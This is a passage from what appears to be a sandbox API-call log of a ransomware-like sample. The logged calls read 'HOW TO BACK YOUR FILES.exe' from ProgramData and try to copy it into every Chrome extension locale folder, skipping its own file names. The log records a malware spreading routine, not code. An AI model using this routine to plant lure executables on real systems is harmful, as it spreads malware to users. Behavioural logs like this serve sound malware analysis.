(normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0104.791] GetLastError () returned 0x0 [0104.791] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0104.791] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0104.791] CloseHandle (hObject=0x120) returned 1 [0104.791] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0104.792] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ta\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x835e4ba0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x6d4ddde0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x6d4ddde0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0104.792] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0104.792] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0104.792] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sw", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sw") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sw" [0104.792] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sw" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sw") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sw" [0104.792] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0104.792] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sw\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\application data\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sw\\how to back your files.exe"), bFailIfExists=1) returned 0 [0104.793] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0104.793] GetLastError () returned 0x0 [0104.793] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0104.793] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0104.793] CloseHandle (hObject=0x120) returned 1 [0104.793] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0104.793] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sw\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x835dd670, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x6d503f40, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x6d503f40, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0104.793] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0104.793] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0104.794] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sv", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sv") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sv" [0104.794] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sv" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sv") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sv" [0104.794] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0104.794] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sv\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\application data\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sv\\how to back your files.exe"), bFailIfExists=1) returned 0 [0104.794] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0104.797] GetLastError () returned 0x0 [0104.797] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0104.797] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0104.797] CloseHandle (hObject=0x120) returned 1 [0104.797] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0104.798] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sv\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x835daf60, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x6d503f40, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x6d503f40, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0104.798] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0104.798] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0104.798] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x835daf60, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x6d503f40, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x6d503f40, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0104.798] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0104.798] lstrcmpiW (lpString1="..", lpString2="aoldtz.exe") returned -1 [0104.798] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sr", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sr") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sr" [0104.798] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sr" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sr") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sr" [0104.798] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0104.798] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sr\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\application data\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sr\\how to back your files.exe"), bFailIfExists=1) returned 0 [0104.799] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0104.799] GetLastError () returned 0x0 [0104.799] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0104.799] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0104.799] CloseHandle (hObject=0x120) returned 1 [0104.800] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0104.800] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sr\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x835cec10, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x6d52a0a0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x6d52a0a0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0104.800] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0104.800] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0104.800] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sl", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sl") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sl" [0104.800] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sl" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sl") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sl" [0104.800] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0104.800] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sl\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\application data\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sl\\how to back your files.exe"), bFailIfExists=1) returned 0 [0104.801] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0104.801] GetLastError () returned 0x0 [0104.801] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0104.801] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0104.801] CloseHandle (hObject=0x120) returned 1 [0104.801] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0104.801] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sl\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x835c4fd0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x6d550200, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x6d550200, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0104.802] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0104.802] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0104.802] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sk", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sk") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sk" [0104.802] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sk" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sk") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sk" [0104.802] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0104.802] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sk\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\application data\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sk\\how to back your files.exe"), bFailIfExists=1) returned 0 [0104.803] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0104.803] GetLastError () returned 0x0 [0104.803] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0104.803] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0104.803] CloseHandle (hObject=0x120) returned 1 [0104.803] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0104.803] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sk\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x835c01b0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x6d550200, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x6d550200, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0104.803] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0104.803] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0104.804] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ru", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ru") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ru" [0104.804] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ru" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ru") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ru" [0104.804] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0104.804] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ru\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\application data\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ru\\how to back your files.exe"), bFailIfExists=1) returned 0 [0104.804] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0104.805] GetLastError () returned 0x0 [0104.805] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0104.805] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0104.805] CloseHandle (hObject=0x120) returned 1 [0104.805] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0104.805] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ru\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x835b6570, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x6d550200, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x6d550200, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0104.805] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0104.805] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0104.805] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ro", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User 